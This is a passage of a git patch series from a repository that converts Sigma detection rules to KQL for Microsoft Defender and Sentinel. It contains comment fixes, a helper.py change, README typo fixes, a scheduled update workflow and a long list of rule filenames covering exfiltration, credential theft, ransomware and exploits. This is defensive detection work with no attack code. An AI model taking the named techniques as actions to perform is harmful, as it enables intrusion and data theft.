Escalation/winrar_creating_files_in_startup_locations.kql index 36495bef..eece0e6e 100644 --- a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql +++ b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql @@ -3,8 +3,7 @@ // Date: 2025-07-16 // Level: high // Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. -This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088. - +// This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 diff --git a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql index 511889d6..19f273fa 100644 --- a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql +++ b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql @@ -3,8 +3,7 @@ // Date: 2022-01-01 // Level: medium // Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB). -This technique is used by post-exploitation frameworks. - +// This technique is used by post-exploitation frameworks. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002 diff --git a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql index e9da2e17..215c87d7 100644 --- a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql +++ b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql @@ -3,8 +3,7 @@ // Date: 2021-09-20 // Level: high // Description: Detects the execution of Xwizard tool from a non-default directory. -When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". - +// When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 // False Positives: diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql index 2e92ce4e..26f09524 100644 --- a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql +++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql @@ -3,7 +3,6 @@ // Date: 2024-01-11 // Level: high // Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. - // MITRE Tactic: Reconnaissance // Tags: attack.reconnaissance, attack.t1595 diff --git a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql index d3d176b0..6d0b5249 100644 --- a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql +++ b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql @@ -3,8 +3,7 @@ // Date: 2021-10-25 // Level: medium // Description: Detects creation of ".vhd"/".vhdx" files by browser processes. -Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. - +// Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. // MITRE Tactic: Resource Development // Tags: attack.resource-development, attack.t1587.001 // False Positives: diff --git a/helper.py b/helper.py index d2bce32f..f5b00022 100644 --- a/helper.py +++ b/helper.py @@ -174,7 +174,17 @@ def extract_mitre_tactic(tags): kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n') kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n') kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n') - kql_file.write(f'// Description: {yaml_contents.get("description", "")}\n') + + # Handle multi-line descriptions + description = yaml_contents.get("description", "") + if description: + # Split by newlines and comment each line + desc_lines = description.split('\n') + kql_file.write(f'// Description: {desc_lines[0]}\n') + for line in desc_lines[1:]: + if line.strip(): # Only write non-empty lines + kql_file.write(f'// {line}\n') + kql_file.write(f'// MITRE Tactic: {TACTIC_FOLDER}\n') kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n') From 38cdce7f7d6eb43590deb86a64d42155f0caa6d8 Mon Sep 17 00:00:00 2001 From: Kaiber <89855993+Khadinxc@users.noreply.github.com> Date: Sat, 15 Nov 2025 19:18:26 +1100 Subject: [PATCH 04/17] Update README.md Spelling mistake on Sentinel --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 3a738095..31cc90d8 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ # Sigma2KQL - Working as of 15/11/2025 -Sigma Queries turned into KQL for Defender and Microsoft Snetinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) +Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) __Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__ From 79178b22ee7113fd8977a1c0d19a1971ec08b0c2 Mon Sep 17 00:00:00 2001 From: Kaiber <89855993+Khadinxc@users.noreply.github.com> Date: Sat, 15 Nov 2025 19:19:22 +1100 Subject: [PATCH 05/17] Update README.md another spelling mistake --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 31cc90d8..ba769d7d 100644 --- a/README.md +++ b/README.md @@ -28,7 +28,7 @@ __Disclaimer: Not all of these rules have been validated either to ensure KQL is ## How do I use the helper to do this locally or in a Detection as Code pipeline? -I've included a pip freeze of required librararies and as per standard practice for Python development I suggest creating a virtual environment not to _break_ system wide package management. +I've included a pip freeze of required libraries and as per standard practice for Python development I suggest creating a virtual environment not to _break_ system wide package management. ### Run the following commands to get started: From d7e478938b20b623a045f5e682868d41486cc7bc Mon Sep 17 00:00:00 2001 From: Kaiber_wsl_desktop Date: Sun, 16 Nov 2025 15:08:33 +1100 Subject: [PATCH 06/17] Added CI pipeline for automatic updates to repo --- .github/workflows/update-sigma-rules.yml | 84 ++++++++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 .github/workflows/update-sigma-rules.yml diff --git a/.github/workflows/update-sigma-rules.yml b/.github/workflows/update-sigma-rules.yml new file mode 100644 index 00000000..a5d02499 --- /dev/null +++ b/.github/workflows/update-sigma-rules.yml @@ -0,0 +1,84 @@ +name: Update Sigma to KQL Rules + +on: + schedule: + # Run daily at 2 AM UTC + - cron: '0 2 * * *' + workflow_dispatch: + # Allow manual trigger + +jobs: + convert-sigma-rules: + runs-on: ubuntu-latest + + steps: + - name: Checkout Sigma2KQL repository + uses: actions/checkout@v4 + with: + token: ${{ secrets.GITHUB_TOKEN }} + fetch-depth: 0 + + - name: Set up Python + uses: actions/setup-python@v5 + with: + python-version: '3.11' + cache: 'pip' + + - name: Clone Sigma rules repository + run: | + git clone https://github.com/SigmaHQ/sigma.git + + - name: Install Python dependencies + run: | + pip install -r requirements.txt + + - name: Run Sigma to KQL conversion + run: | + python helper.py --sigma-dir "./sigma" --output-dir "./KQL" + + - name: Check for changes + id: check_changes + run: | + git diff --quiet KQL/ || echo "changes=true" >> $GITHUB_OUTPUT + + - name: Create Pull Request + if: steps.check_changes.outputs.changes == 'true' + uses: peter-evans/create-pull-request@v6 + with: + token: ${{ secrets.GITHUB_TOKEN }} + commit-message: 'chore: update KQL rules from latest Sigma rules' + branch: update-sigma-rules-${{ github.run_number }} + delete-branch: true + title: 'Update KQL Rules from Sigma Repository' + body: | + ## Automated Sigma to KQL Conversion + + This PR contains updated KQL rules converted from the latest Sigma rules repository. + + ### Changes + - Updated KQL rules from SigmaHQ/sigma repository + - Conversion date: ${{ github.event.repository.updated_at }} + - Workflow run: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }} + + ### Review Checklist + - [ ] Review changed rules for accuracy + - [ ] Verify new rules are properly formatted + - [ ] Check for any failed conversions in workflow logs + + --- + *This PR was automatically created by the Update Sigma Rules workflow.* + labels: | + automated + sigma-update + reviewers: ${{ github.repository_owner }} + + - name: Summary + if: steps.check_changes.outputs.changes == 'true' + run: | + echo "✅ Pull request created with updated Sigma rules" + echo "📊 Check the PR for detailed changes" + + - name: No changes summary + if: steps.check_changes.outputs.changes != 'true' + run: | + echo "ℹ️ No changes detected - rules are up to date" From f8e3b357f3dffed150e54f849c2c40d961132e57 Mon Sep 17 00:00:00 2001 From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 16 Nov 2025 04:10:14 +0000 Subject: [PATCH 07/17] chore: update KQL rules from latest Sigma rules --- .../apt31_judgement_panda_activity.kql | 22 +++++----- .../conti_ntds_exfiltration_command.kql | 18 ++++---- ...e_database_dumping_activity_via_sqlcmd.kql | 18 ++++---- ..._exe_file_creation_by_uncommon_process.kql | 24 +++++----- .../pandemic_registry_key.kql | 18 ++++---- ...cxdesktopapp_beaconing_activity_netcon.kql | 22 +++++----- ...eamer_rat_loading_net_executable_image.kql | 18 ++++---- ...ulnerability_cve_2025_33053_image_load.kql | 22 +++++----- .../potential_pikabot_c2_activity.kql | 24 +++++----- ...picious_child_process_of_3cxdesktopapp.kql | 18 ++++---- .../Credential Access/gallium_iocs.kql | 18 ++++---- ..._russian_apt_credential_theft_activity.kql | 22 +++++----- ..._file_potential_cve_2025_24054_exploit.kql | 26 +++++------ ...ishing_campaign_commandline_indicators.kql | 22 +++++----- ...2018_phishing_campaign_file_indicators.kql | 22 +++++----- .../apt_privatelog_image_load_pattern.kql | 22 +++++----- .../blue_mockingbird_registry.kql | 18 ++++---- ...d_sleet_apt_dll_sideloading_indicators.kql | 22 +++++----- ...t_apt_scheduled_task_creation_registry.kql | 18 ++++---- ...ed_by_svr_for_graphicalproton_backdoor.kql | 18 ++++---- ...ation_group_dll_u_export_function_load.kql | 22 +++++----- ...lden_chickens_deployment_via_ocx_files.kql | 18 ++++---- .../exploit_for_cve_2015_1641.kql | 18 ++++---- .../flowcloud_registry_markers.kql | 24 +++++----- ...st_blizzard_apt_file_creation_activity.kql | 24 +++++----- ...t_javascript_constrained_file_creation.kql | 24 +++++----- ...blizzard_apt_process_creation_activity.kql | 20 ++++----- ...ingle_digit_dll_execution_via_rundll32.kql | 18 ++++---- ...ka_backdoor_execution_via_rundll32_exe.kql | 18 ++++---- .../lazarus_apt_dll_sideloading_activity.kql | 22 +++++----- .../lazarus_system_binary_masquerading.kql | 22 +++++----- ..._dll_load_by_compromised_3cxdesktopapp.kql | 22 +++++----- .../notpetya_ransomware_activity.kql | 18 ++++---- ...l_extension_execution_via_rundll32_exe.kql | 18 ++++---- ...ushroom_dll_load_activity_via_regsvr32.kql | 18 ++++---- ...al_compromised_3cxdesktopapp_execution.kql | 22 +++++----- ...promised_3cxdesktopapp_update_activity.kql | 18 ++++---- ...tial_devil_bait_malware_reconnaissance.kql | 22 +++++----- ...potential_devil_bait_related_indicator.kql | 22 +++++----- .../potential_dridex_activity.kql | 22 +++++----- .../potential_emotet_rundll32_execution.kql | 18 ++++---- .../potential_empiremonkey_activity.kql | 22 +++++----- ...guineapig_goolgeupdate_process_anomaly.kql | 18 ++++---- ...al_kapeka_decrypted_backdoor_indicator.kql | 20 ++++----- ...ial_ke3chang_tidepool_malware_activity.kql | 18 ++++---- .../potential_muddywater_apt_activity.kql | 22 +++++----- ...cious_command_combinations_via_cmd_exe.kql | 22 +++++----- .../potential_qakbot_rundll32_execution.kql | 22 +++++----- ...raspberry_robin_cpl_execution_activity.kql | 20 ++++----- .../ps_exe_renamed_sysinternals_tool.kql | 22 +++++----- .../qakbot_regsvr32_calc_pattern.kql | 22 +++++----- .../qakbot_rundll32_exports_execution.kql | 22 +++++----- ..._rundll32_fake_dll_extension_execution.kql | 22 +++++----- ...stealer_module_launch_via_rundll32_exe.kql | 18 ++++---- ...t_slashandgrab_exploitation_indicators.kql | 18 ++++---- ..._sieve_malware_file_indicator_creation.kql | 22 +++++----- .../sofacy_trojan_loader_activity.kql | 18 ++++---- ...do_privilege_escalation_cve_2019_14287.kql | 22 +++++----- ...ous_razerinstaller_explorer_subprocess.kql | 22 +++++----- ...ue_of_msdt_in_registry_cve_2022_30190_.kql | 18 ++++---- ...mpressed_files_from_temp_sh_using_wget.kql | 18 ++++---- ...file_from_untrusted_direct_ip_via_wget.kql | 18 ++++---- ...l_certificate_exfiltration_via_openssl.kql | 18 ++++---- .../potential_pikabot_discovery_activity.kql | 24 +++++----- .../Execution/adwind_rat_jrat.kql | 18 ++++---- ..._spooler_exploitation_filename_pattern.kql | 18 ++++---- .../cve_2021_26858_exchange_exploitation.kql | 22 +++++----- ...ve_2021_44077_poc_default_dropped_file.kql | 22 +++++----- ...22_24527_microsoft_connected_cache_lpe.kql | 18 ++++---- ...icious_confluence_child_process_linux_.kql | 22 +++++----- ...ious_confluence_child_process_windows_.kql | 18 ++++---- ...tempt_suspicious_double_extension_file.kql | 18 ++++---- ...ttempt_suspicious_winrar_child_process.kql | 22 +++++----- ...tential_exploitation_rev_file_creation.kql | 22 +++++----- ...kgate_autoit3_exe_execution_parameters.kql | 26 +++++------ ...op_darkgate_loader_in_c_temp_directory.kql | 22 +++++----- .../Execution/darkside_ransomware_pattern.kql | 22 +++++----- ...ond_sleet_apt_file_creation_indicators.kql | 22 +++++----- ..._sleet_apt_process_activity_indicators.kql | 22 +++++----- .../droppers_exploiting_cve_2017_11882.kql | 18 ++++---- .../Execution/elise_backdoor_activity.kql | 22 +++++----- .../emotet_loader_execution_via_lnk_file.kql | 24 +++++----- .../Execution/exploit_for_cve_2017_0261.kql | 22 +++++----- .../Execution/exploit_for_cve_2017_8759.kql | 18 ++++---- ...25_59287_wsus_suspicious_child_process.kql | 24 +++++----- ...e_2020_1472_execution_of_zerologon_poc.kql | 18 ++++---- .../fakeupdates_socgholish_activity.kql | 22 +++++----- .../file_creation_related_to_rat_clients.kql | 22 +++++----- .../Execution/fireball_archer_install.kql | 18 ++++---- .../goofy_guineapig_backdoor_ioc.kql | 22 +++++----- .../greenbug_espionage_group_indicators.kql | 22 +++++----- .../griffon_malware_attack_pattern.kql | 22 +++++----- .../hermetic_wiper_tg_process_patterns.kql | 18 ++++---- ...ackdoor_curl_tor_socks_proxy_execution.kql | 22 +++++----- ...apeka_backdoor_loaded_via_rundll32_exe.kql | 20 ++++----- .../Execution/katz_stealer_dll_loaded.kql | 26 +++++------ .../lace_tempest_cobalt_strike_download.kql | 22 +++++----- .../lace_tempest_file_indicators.kql | 22 +++++----- .../lace_tempest_malware_loader_execution.kql | 22 +++++----- .../Execution/lazarus_group_activity.kql | 22 +++++----- .../macos_filegrabber_infostealer.kql | 18 ++++---- .../Execution/mercury_apt_activity.kql | 18 ++++---- ...erafaspex_suspicious_process_execution.kql | 22 +++++----- ...storm_log4j_wstomcat_process_execution.kql | 18 ++++---- ...ageengine_suspicious_process_execution.kql | 22 +++++----- ...nyx_sleet_apt_file_creation_indicators.kql | 22 +++++----- ..._mf_ng_exploitation_related_indicators.kql | 22 +++++----- .../papercut_mf_ng_potential_exploitation.kql | 22 +++++----- ...dstorm_apt_process_activity_indicators.kql | 22 +++++----- .../potential_apt10_cloud_hopper_activity.kql | 22 +++++----- ...tential_apt_fin7_exploitation_activity.kql | 24 +++++----- ...nnaissance_powertrash_related_activity.kql | 22 +++++----- ...fin7_related_powershell_script_created.kql | 18 ++++---- ..._panda_activity_against_australian_gov.kql | 22 +++++----- .../potential_baby_shark_malware_activity.kql | 18 ++++---- ...otential_blackbyte_ransomware_activity.kql | 18 ++++---- ...al_cve_2021_26857_exploitation_attempt.kql | 18 ++++---- ...al_cve_2021_40444_exploitation_attempt.kql | 18 ++++---- ...space_one_access_remote_code_execution.kql | 24 +++++----- ...al_cve_2022_29072_exploitation_attempt.kql | 22 +++++----- ..._exploitation_fake_wermgr_exe_creation.kql | 18 ++++---- ...874_exploitation_fake_wermgr_execution.kql | 22 +++++----- ...loitation_uncommon_report_wer_location.kql | 18 ++++---- ...ect_os_command_injection_file_creation.kql | 24 +++++----- .../Execution/potential_emotet_activity.kql | 22 +++++----- ...tation_attempt_from_office_application.kql | 18 ++++---- ...2024_3094_suspicious_ssh_child_process.kql | 22 +++++----- ...uspicious_creation_of_esx_admins_group.kql | 22 +++++----- ...tial_goofy_guineapig_backdoor_activity.kql | 22 +++++----- ...kabot_activity_lure_document_execution.kql | 20 ++++----- .../potential_maze_ransomware_activity.kql | 22 +++++----- ...tation_dynamic_compilation_via_csc_exe.kql | 28 ++++++------ .../Execution/potential_qbot_activity.kql | 22 +++++----- ...ential_raspberry_robin_dot_ending_file.kql | 18 ++++---- ...ential_sap_netweaver_webshell_creation.kql | 24 +++++----- ..._sap_netweaver_webshell_creation_linux.kql | 24 +++++----- ..._malware_installation_binary_indicator.kql | 22 +++++----- ...e_installation_cli_arguments_indicator.kql | 22 +++++----- ..._malware_persistence_service_execution.kql | 18 ++++---- .../potential_snatch_ransomware_activity.kql | 22 +++++----- .../printernightmare_mimikatz_driver_name.kql | 22 +++++----- .../qakbot_uninstaller_execution.kql | 22 +++++----- ..._initial_execution_from_external_drive.kql | 22 +++++----- ...robin_subsequent_execution_of_commands.kql | 22 +++++----- ...revil_kaseya_incident_malware_patterns.kql | 18 ++++---- ...orschach_ransomware_execution_activity.kql | 22 +++++----- ...nake_malware_installer_name_indicators.kql | 22 +++++----- ...e_malware_kernel_driver_file_indicator.kql | 22 +++++----- ...are_werfault_persistence_file_creation.kql | 18 ++++---- .../Execution/trickbot_malware_activity.kql | 18 ++++---- .../tropictrooper_campaign_november_2018.kql | 18 ++++---- .../turla_group_lateral_movement.kql | 18 ++++---- .../Execution/unc2452_powershell_pattern.kql | 22 +++++----- .../unc2452_process_creation_patterns.kql | 18 ++++---- ..._barracuda_esg_exploitation_indicators.kql | 22 +++++----- ...nc4841_email_exfiltration_file_pattern.kql | 18 ++++---- .../unc4841_potential_seaspy_execution.kql | 22 +++++----- ...snif_redirection_of_discovery_commands.kql | 22 +++++----- .../Execution/zxshell_malware.kql | 22 +++++----- ...ackage_malicious_exfiltration_via_curl.kql | 22 +++++----- .../funklocker_ransomware_file_creation.kql | 22 +++++----- .../Impact/lockergoga_ransomware_activity.kql | 22 +++++----- .../potential_conti_ransomware_activity.kql | 22 +++++----- .../Impact/potential_dtrack_rat_activity.kql | 22 +++++----- ...hell_command_injection_processcreation.kql | 22 +++++----- .../atlassian_confluence_cve_2022_26134.kql | 18 ++++---- ..._authentication_bypass_cve_2025_57791_.kql | 20 ++++----- ...cve_2021_31979_cve_2021_33771_exploits.kql | 22 +++++----- ...979_cve_2021_33771_exploits_by_sourgum.kql | 22 +++++----- ...e_2024_50623_exploitation_attempt_cleo.kql | 22 +++++----- .../Initial Access/dns_rce_cve_2020_1350.kql | 22 +++++----- ...oited_cve_2020_10189_zoho_manageengine.kql | 18 ++++---- ...ce_cve_2021_26084_exploitation_attempt.kql | 18 ++++---- ...28_exploitation_attempt_vmware_horizon.kql | 22 +++++----- ...al_cve_2022_26809_exploitation_attempt.kql | 22 +++++----- ...empt_of_undocumented_windowsserver_rce.kql | 18 ++++---- ...tation_of_goanywhere_mft_vulnerability.kql | 24 +++++----- ...ve_2025_53770_exploitation_file_create.kql | 20 ++++----- ...cve_2025_53770_exploitation_indicators.kql | 20 ++++----- .../suspicious_crushftp_child_process.kql | 28 ++++++------ .../wannacry_ransomware_activity.kql | 18 ++++---- .../blackbyte_ransomware_registry.kql | 22 +++++----- .../Persistence/blue_mockingbird.kql | 18 ++++---- ...l_rat_anonymous_user_process_execution.kql | 18 ++++---- ...oldsteel_rat_cleanup_command_execution.kql | 22 +++++----- ...teel_rat_service_persistence_execution.kql | 22 +++++----- ...raversal_webshell_drop_cve_2025_57790_.kql | 20 ++++----- ..._suspicious_new_printer_ports_registry.kql | 24 +++++----- ...eenconnect_path_traversal_exploitation.kql | 22 +++++----- .../darkgate_user_created_via_net_exe.kql | 22 +++++----- ...oiting_setupcomplete_cmd_cve_2019_1378.kql | 18 ++++---- ...eka_backdoor_configuration_persistence.kql | 20 ++++----- .../moriya_rootkit_file_created.kql | 18 ++++---- .../oceanlotus_registry_activity.kql | 18 ++++---- .../outlook_task_note_reminder_received.kql | 22 +++++----- .../potential_bearlpe_exploitation.kql | 18 ++++---- ...steel_persistence_service_dll_creation.kql | 18 ++++---- ...coldsteel_persistence_service_dll_load.kql | 22 +++++----- ...otential_coldsteel_rat_file_indicators.kql | 18 ++++---- ...al_coldsteel_rat_windows_user_creation.kql | 18 ++++---- ...on_hta_file_creation_by_foxitpdfreader.kql | 18 ++++---- ...e_2023_36884_exploitation_dropped_file.kql | 18 ++++---- ...registry_blob_related_to_snake_malware.kql | 22 +++++----- ...tivity_shutdown_schedule_task_creation.kql | 20 ++++----- ...otential_netwire_rat_activity_registry.kql | 18 ++++---- ...al_notepad_cve_2025_49144_exploitation.kql | 22 +++++----- ...al_printnightmare_exploitation_attempt.kql | 18 ++++---- ...registry_set_internet_settings_zonemap.kql | 20 ++++----- ...ntial_ursnif_malware_activity_registry.kql | 18 ++++---- ...reenconnect_user_database_modification.kql | 24 +++++----- ...xploitation_cve_2021_35211_by_dev_0322.kql | 22 +++++----- ...lud_malicious_github_workflow_creation.kql | 22 +++++----- ...all_sieve_malware_registry_persistence.kql | 22 +++++----- ...nake_malware_covert_store_registry_key.kql | 18 ++++---- .../Persistence/sourgum_actor_behaviours.kql | 18 ++++---- ...s_printerports_creation_cve_2020_1048_.kql | 22 +++++----- ..._spawned_by_centrestack_portal_apppool.kql | 22 +++++----- ...spooler_service_suspicious_binary_load.kql | 22 +++++----- .../apt27_emissary_panda_activity.kql | 22 +++++----- .../chromeloader_malware_execution.kql | 22 +++++----- ...user_and_guid_password_cve_2025_57788_.kql | 24 +++++----- .../defrag_deactivation.kql | 18 ++++---- .../exploiting_cve_2019_1388.kql | 18 ++++---- ...d_apt_custom_protocol_handler_creation.kql | 24 +++++----- ...stom_protocol_handler_dll_registry_set.kql | 24 +++++----- ...hafnium_exchange_exploitation_activity.kql | 22 +++++----- ...ss_spawning_rundll32_guloader_activity.kql | 24 +++++----- ...r_lpe_cve_2021_41379_file_create_event.kql | 22 +++++----- .../kapeka_backdoor_autorun_persistence.kql | 18 ++++---- .../kapeka_backdoor_persistence_activity.kql | 30 ++++++------- .../leviathan_registry_key_activity.kql | 18 ++++---- ...vity_execution_of_more_com_and_vbc_exe.kql | 22 +++++----- ..._potential_cve_2025_32463_exploitation.kql | 28 ++++++------ .../oilrig_apt_activity.kql | 22 +++++----- .../oilrig_apt_registry_persistence.kql | 22 +++++----- .../operation_wocao_activity.kql | 22 +++++----- .../pingback_backdoor_activity.kql | 22 +++++----- ...pingback_backdoor_dll_loading_activity.kql | 22 +++++----- .../pingback_backdoor_file_indicators.kql | 22 +++++----- ...otential_actinium_persistence_activity.kql | 22 +++++----- ...al_cve_2021_41379_exploitation_attempt.kql | 18 ++++---- ...ve_2023_21554_queuejumper_exploitation.kql | 18 ++++---- ...l_cve_2024_35250_exploitation_activity.kql | 24 +++++----- ...hftp_rce_vulnerability_cve_2025_54309_.kql | 22 +++++----- ...ot_activity_winlogon_shell_persistence.kql | 22 +++++----- .../potential_pikabot_hollowing_activity.kql | 24 +++++----- .../potential_plugx_activity.kql | 18 ++++---- .../potential_ryuk_ransomware_activity.kql | 22 +++++----- ...l_systemnightmare_exploitation_attempt.kql | 18 ++++---- ...r_payload_execution_via_scheduled_task.kql | 26 +++++------ ...ll_sieve_malware_commandline_indicator.kql | 22 +++++----- .../suspicious_sysmon_as_execution_parent.kql | 18 ++++---- .../suspicious_vbscript_un2452_pattern.kql | 18 ++++---- .../taidoor_rat_dll_load.kql | 18 ++++---- .../turla_group_commands_may_2020.kql | 18 ++++---- .../winnti_malware_hk_university_campaign.kql | 22 +++++----- .../winnti_pipemon_characteristics.kql | 22 +++++----- .../conti_volume_shadow_listing.kql | 18 ++++---- .../foggyweb_backdoor_dll_loading.kql | 22 +++++----- .../formbook_process_creation.kql | 18 ++++---- .../mustang_panda_dropper.kql | 22 +++++----- ...ous_word_cab_file_write_cve_2021_40444.kql | 18 ++++---- .../clipboard_data_collection_via_pbpaste.kql | 30 ++++++------- ...ed_compressed_file_extraction_via_7zip.kql | 22 +++++----- ...suspicious_compression_tool_parameters.kql | 18 ++++---- .../Collection/system_drawing_dll_load.kql | 22 +++++----- .../curl_exe_execution.kql | 24 +++++----- ...rl_exe_execution_with_custom_useragent.kql | 24 +++++----- .../file_download_via_curl_exe.kql | 26 +++++------ ...ion_initiated_from_users_public_folder.kql | 26 +++++------ ...suspicious_azure_front_door_connection.kql | 26 +++++------ ...ary_code_execution_and_remote_sessions.kql | 38 ++++++++-------- ...e_code_tunnel_execution_file_indicator.kql | 22 +++++----- ...dential_files_by_uncommon_applications.kql | 32 +++++++------- ...nsitive_files_by_uncommon_applications.kql | 30 ++++++------- ...vol_policies_share_by_uncommon_process.kql | 18 ++++---- ..._loaded_by_uncommon_suspicious_process.kql | 28 ++++++------ ...og_query_requests_by_builtin_utilities.kql | 22 +++++----- .../Credential Access/pfx_file_creation.kql | 44 +++++++++---------- ...assword_reconnaissance_via_findstr_exe.kql | 18 ++++---- .../unattend_xml_file_access_attempt.kql | 20 ++++----- ...eg_hive_files_by_uncommon_applications.kql | 22 +++++----- ...ok_mail_files_by_uncommon_applications.kql | 32 +++++++------- .../ads_zone_identifier_deleted.kql | 22 +++++----- .../amsi_dll_load_by_uncommon_process.kql | 22 +++++----- ...tsproxy_dll_loaded_by_uncommon_process.kql | 24 +++++----- .../codepage_modification_via_mode_com.kql | 20 ++++----- .../diskshadow_child_process_spawned.kql | 22 +++++----- .../diskshadow_script_mode_execution.kql | 22 +++++----- .../dll_call_by_ordinal_via_rundll32_exe.kql | 24 +++++----- ...ork_connection_to_non_local_ip_address.kql | 26 +++++------ .../dmp_hdmp_file_creation.kql | 22 +++++----- ...ic_net_compilation_via_csc_exe_hunting.kql | 22 +++++----- ...le_or_folder_permissions_modifications.kql | 24 +++++----- ...dless_process_launched_via_conhost_exe.kql | 20 ++++----- ..._exe_initiated_http_network_connection.kql | 22 +++++----- ..._the_cryptography_powershell_namespace.kql | 26 +++++------ ...rosoft_office_trusted_location_updated.kql | 22 +++++----- .../microsoft_workflow_compiler_execution.kql | 22 +++++----- ...initiated_network_connection_over_http.kql | 26 +++++------ ...cting_package_created_via_iexpress_exe.kql | 26 +++++------ ...e_added_via_new_netfirewallrule_cmdlet.kql | 22 +++++----- ...e_obfuscation_using_unicode_characters.kql | 20 ++++----- ...sideloading_activity_via_extexport_exe.kql | 22 +++++----- ...on_via_explorer_exe_from_shell_process.kql | 28 ++++++------ ..._execution_from_guid_like_folder_names.kql | 24 +++++----- ..._the_cryptography_powershell_namespace.kql | 26 +++++------ ...isterserver_export_function_explicitly.kql | 24 +++++----- ...rvice_binary_in_user_controlled_folder.kql | 24 +++++----- ...files_as_system_files_using_attrib_exe.kql | 18 ++++---- .../terminate_linux_process_via_kill.kql | 18 ++++---- .../use_short_name_path_in_command_line.kql | 34 +++++++------- ..._file_creation_in_codeintegrity_folder.kql | 22 +++++----- .../Discovery/cmd_shell_output_redirect.kql | 24 +++++----- .../Discovery/net_exe_execution.kql | 22 +++++----- .../Discovery/process_discovery.kql | 24 +++++----- .../Discovery/sc_exe_query_execution.kql | 24 +++++----- .../suspicious_tasklist_discovery_command.kql | 22 +++++----- ...tem_information_discovery_via_wmic_exe.kql | 26 +++++------ .../arbitrary_command_execution_using_wsl.kql | 24 +++++----- .../cab_file_extraction_via_wusa_exe.kql | 22 +++++----- ...ment_execution_dfsvc_exe_child_process.kql | 22 +++++----- ...d_executed_via_run_dialog_box_registry.kql | 24 +++++----- ...xe_network_connection_to_non_local_ips.kql | 22 +++++----- ..._new_module_via_powershell_commandline.kql | 22 +++++----- ..._of_script_inside_of_a_compressed_file.kql | 32 +++++++------- .../microsoft_excel_add_in_loaded.kql | 22 +++++----- .../microsoft_word_add_in_loaded.kql | 22 +++++----- ...ection_initiated_by_powershell_process.kql | 30 ++++++------- ...tware_execution_uc_berkeley_signature_.kql | 24 +++++----- ...l_file_override_append_via_set_command.kql | 28 ++++++------ ..._suspicious_powershell_child_processes.kql | 24 +++++----- .../process_execution_from_webdav_share.kql | 28 ++++++------ ...path_configuration_file_creation_linux.kql | 26 +++++------ ...path_configuration_file_creation_macos.kql | 26 +++++------ ...th_configuration_file_creation_windows.kql | 26 +++++------ ...access_tool_ammy_admin_agent_execution.kql | 22 +++++----- ...s_tool_cmd_exe_execution_via_anyviewer.kql | 22 +++++----- ...nnect_remote_command_execution_hunting.kql | 24 +++++----- .../scheduled_task_created_filecreation.kql | 22 +++++----- .../scheduled_task_created_registry.kql | 22 +++++----- ...m_potential_suspicious_parent_location.kql | 24 +++++----- ...s_new_instance_of_an_office_com_object.kql | 24 +++++----- .../unusually_long_powershell_commandline.kql | 18 ++++---- .../wmi_module_loaded_by_uncommon_process.kql | 18 ++++---- ...vbe_file_execution_via_cscript_wscript.kql | 22 +++++----- ...connection_open_attempt_via_winscp_cli.kql | 18 ++++---- ...tential_data_exfiltration_via_curl_exe.kql | 22 +++++----- .../Exfiltration/tunneling_tool_execution.kql | 22 +++++----- ...scp_execution_from_non_standard_folder.kql | 18 ++++---- .../process_terminated_via_taskkill.kql | 24 +++++----- .../webdav_temporary_local_file_creation.kql | 22 +++++----- .../smb_over_quic_via_net_exe.kql | 22 +++++----- 